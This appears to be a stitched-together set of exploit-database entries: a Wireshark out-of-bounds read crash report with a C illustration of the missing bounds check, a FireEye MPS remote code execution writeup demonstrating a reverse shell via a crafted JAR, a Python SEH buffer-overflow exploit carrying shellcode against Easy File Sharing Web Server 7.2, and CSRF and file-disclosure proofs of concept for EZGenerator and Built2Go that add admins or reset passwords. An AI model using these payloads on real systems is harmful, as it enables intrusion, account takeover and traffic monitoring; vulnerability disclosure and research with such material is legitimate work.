Source: https://code.google.com/p/google-security-research/issues/detail?id=641
The following crash due to a stack-based out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==2067==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe26462c20 at pc 0x0000009cf704 bp 0x7ffe26462b70 sp 0x7ffe26462b68
READ of size 4 at 0x7ffe26462c20 thread T0
#0 0x9cf703 in getRate wireshark/wiretap/vwr.c:2276:20
#1 0x9c74f7 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1533:25
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe26462c20 is located in stack of thread T0 at offset 160 in frame
#0 0x9cf32f in getRate wireshark/wiretap/vwr.c:2261
This frame has 6 object(s):
[32, 80) 'canonical_rate_legacy'
[112, 144) 'canonical_ndbps_20_ht'
[176, 208) 'canonical_ndbps_40_ht' <== Memory access at offset 160 underflows this variable
[240, 276) 'canonical_ndbps_20_vht'
[320, 360) 'canonical_ndbps_40_vht'
[400, 440) 'canonical_ndbps_80_vht'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2276:20 in getRate
Shadow bytes around the buggy address:
0x100044c84530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84570: f1 f1 f1 f1 00 00 00 00 00 00 f2 f2 f2 f2 00 00
=>0x100044c84580: 00 00 f2 f2[f2]f2 00 00 00 00 f2 f2 f2 f2 00 00
0x100044c84590: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 f2 f2 f2
0x100044c845a0: f2 f2 00 00 00 00 00 f3 f3 f3 f3 f3 00 00 00 00
0x100044c845b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2067==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11789. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39006.zip
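The getRate frame listing above pins the read to offset 160: the 32-byte `canonical_ndbps_20_ht` table ends at offset 144, so the 4-byte access is index 12 of an 8-entry table, an MCS index taken from the capture file and used without a range check. The following is an added illustration of a checked version of that lookup, not Wireshark's vwr.c code; the table names are borrowed from the frame listing, the values are the standard 802.11n HT Ndbps figures for MCS 0-7, and the record fields fed in at the end are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Standard 802.11n data bits per OFDM symbol (Ndbps), HT MCS 0-7, one spatial
 * stream. 8 entries of 4 bytes: the same 32-byte footprint the ASAN frame
 * listing reports for these two tables. */
static const uint32_t canonical_ndbps_20_ht[8] = { 26, 52, 78, 104, 156, 208, 234, 260 };
static const uint32_t canonical_ndbps_40_ht[8] = { 54, 108, 162, 216, 324, 432, 486, 540 };

#define N_ENTRIES(t) (sizeof(t) / sizeof((t)[0]))

/* The shape of the bug: the MCS index comes straight from the record, so
 * index 12 reads 16 bytes past the end of the 20 MHz table. Kept for
 * contrast only; nothing below calls it. */
uint32_t ndbps_unchecked(unsigned mcs, int wide)
{
    return wide ? canonical_ndbps_40_ht[mcs] : canonical_ndbps_20_ht[mcs];
}

/* Checked lookup: returns 0 for an MCS the table does not cover
 * (0 is never a valid Ndbps, so it doubles as the error value). */
uint32_t ndbps_checked(unsigned mcs, int wide)
{
    const uint32_t *table = wide ? canonical_ndbps_40_ht : canonical_ndbps_20_ht;
    size_t n = wide ? N_ENTRIES(canonical_ndbps_40_ht) : N_ENTRIES(canonical_ndbps_20_ht);
    if (mcs >= n)
        return 0;                       /* the missing check */
    return table[mcs];
}

/* PHY rate in kbit/s: Ndbps per 4 us symbol (long guard interval) or per
 * 3.6 us (short GI). Returns -1 for an MCS outside the table instead of
 * reading whatever happens to sit past it on the stack. */
long ht_rate_kbps(unsigned mcs, int wide, int short_gi)
{
    uint32_t ndbps = ndbps_checked(mcs, wide);
    if (ndbps == 0)
        return -1;
    /* ndbps / 4.0 us = ndbps * 250 kbit/s; ndbps / 3.6 us = ndbps * 10000 / 36 */
    return short_gi ? (long)ndbps * 10000 / 36 : (long)ndbps * 250;
}

int main(void)
{
    /* Constructed record header values, as a vwr-style reader would decode them */
    struct { unsigned mcs; int wide; int sgi; } recs[] = { {7, 1, 0}, {0, 0, 1}, {12, 0, 0} };
    for (size_t i = 0; i < sizeof recs / sizeof recs[0]; i++)
        printf("mcs %u %s GI=%s -> %ld kbit/s\n",
               recs[i].mcs, recs[i].wide ? "40MHz" : "20MHz",
               recs[i].sgi ? "short" : "long",
               ht_rate_kbps(recs[i].mcs, recs[i].wide, recs[i].sgi));
    return 0;
}
```

The point generalises to every table in that frame (legacy, HT and VHT): the index width in the file format (here an MCS field that can hold values up to 255 or more) is larger than the table it selects from, so the bound has to come from the table's own size, never from the field.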
Source: https://code.google.com/p/google-security-research/issues/detail?id=666
The FireEye MPS (Malware Protection System) is vulnerable to a remote code execution vulnerability, simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network.
This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc). This is about the worst possible vulnerability that you can imagine for a FireEye user; it literally does not get worse than this.
This bug is in one of the analysis tools used by the MIP (Malware Input Processor), which has various tools for analysis of different file types. One of these tools is a script that attempts to decompile Java Archives, then runs some simple regexes over the decompiled code:
$ grep subprocess.Popen /opt/fireeye/scripts/mip/content/jar.py
sp = subprocess.Popen(yara_cmd,stdout=outfile)
sp = subprocess.Popen(cmd_list,stdout=outfile,stderr=errfile)
sp = subprocess.Popen(jarsigner_cmd,stdout=outfile,stderr=errfile)
The decompiler used is actually a modified version of JODE, an ancient open-source decompiler written in Java:
http://jode.sourceforge.net/
Examining the source code for JODE shows that it supports a "String Deobfuscation" feature that relies on reflection; this is visible here:
http://sourceforge.net/p/jode/code/HEAD/tree/trunk/jode/src/net/sf/jode/expr/InvokeOperator.java
public Object invokeMethod(Reference ref, boolean isVirtual,
Object cls, Object[] params)
throws InterpreterException, InvocationTargetException {
if (cls == null && ref.getClazz().equals(classSig)) {
BasicBlocks bb = classInfo
.findMethod(ref.getName(), ref.getType())
.getBasicBlocks();
if (bb != null)
return interpreter.interpretMethod(bb, null, params);
throw new InterpreterException
("Can't interpret static native method: "+ref);
} else
return super.invokeMethod(ref, isVirtual, cls, params);
}
}
By carefully crafting a class file that passes JODE's test for obfuscation, we were able to invoke arbitrary methods using reflection. We did this using the jasmin compiler:
# create the hostile JAR
$ jasmin ReverseShell.j
$ jar cvf fireeye.jar ReverseShell.class
added manifest
adding: ReverseShell.class(in = 489) (out= 311)(deflated 36%)
# Now start a reverse shell listening
$ nc -lp 9090 &
[1] 11115
# download a file over the monitored network
$ curl http://192.168.1.1/appliance-test/fireeye.jar &> /dev/null
# wait for the connect back shell attempt
$ wait
uid=821(mip) gid=3111(mip)
groups=3111(mip),602(antivirus),2000(analysis),3001(stats),3134(mip_child),3200(dipcshm),3203(reports),3204(contents),3210(mip_client)
[1]+ Done nc -lp 9090
# Code execution!
(Getting root from gid=mip_child is trivial; this is a second bug that will be filed.)
The Jasmin file we used is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39007.zip
#!/usr/bin/env python3
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys

if len(sys.argv) != 3:
    sys.exit("Usage: %s ip port" % sys.argv[0])
host = sys.argv[1]
port = int(sys.argv[2])

a = socket.socket()
print("Connecting to: " + host + ":" + str(port))
a.connect((host, port))

entire = 4500                     # total length of the request path
# Junk: 4061 bytes to reach the SEH record
buff = b"A" * 4061
# Next SEH: short jump (EB 0A) over the handler address into the NOP sled
buff += b"\xeb\x0A\x90\x90"
# SEH handler: pop pop ret gadget at 0x10019798 (little-endian)
buff += b"\x98\x97\x01\x10"
# NOP sled the short jump lands in
buff += b"\x90" * 19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
    b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    b"\x1c\x39\xbd"
)
buff += shellcode
buff += b"\x90" * 7
# Pad the rest of the path with filler
buff += b"A" * (entire - 4061 - 4 - 4 - 20 - len(shellcode) - 20)
# GET request carrying the overlong path
a.send(b"GET " + buff + b" HTTP/1.0\r\n\r\n")
a.close()
print("Done...")
source: https://www.securityfocus.com/bid/64740/info
EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.
An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Local File Disclosure:
=====================
www.example.com/utils.php?action=download&filename=file.php%00
CSRF [Add Admin]:
================
<html>
<body>
<form method="POST" name="form0" action="http://www.example.com/centraladmin.php?process=processuser">
<input type="hidden" name="flag" value="add"/>
<input type="hidden" name="old_username" value=""/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="name" value="mm"/>
<input type="hidden" name="sirname" value="hh"/>
<input type="hidden" name="email" value="email@live.com"/>
<input type="hidden" name="password" value="12121212"/>
<input type="hidden" name="repeatedpassword" value="12121212"/>
<input type="hidden" name="select_all" value="yes"/>
<input type="hidden" name="access_to_page47" value="2"/>
<input type="hidden" name="save" value="Save"/>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method="POST" name="form0" action="http://www.example.com/adminpanel/edit_admin.php">
<input type="hidden" name="userid" value="ADMIN"/>
<input type="hidden" name="pass" value="12121212"/>
<input type="hidden" name="retypepass" value="12121212"/>
<input type="hidden" name="addnew" value="1"/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="new" value="Submit"/>
</form>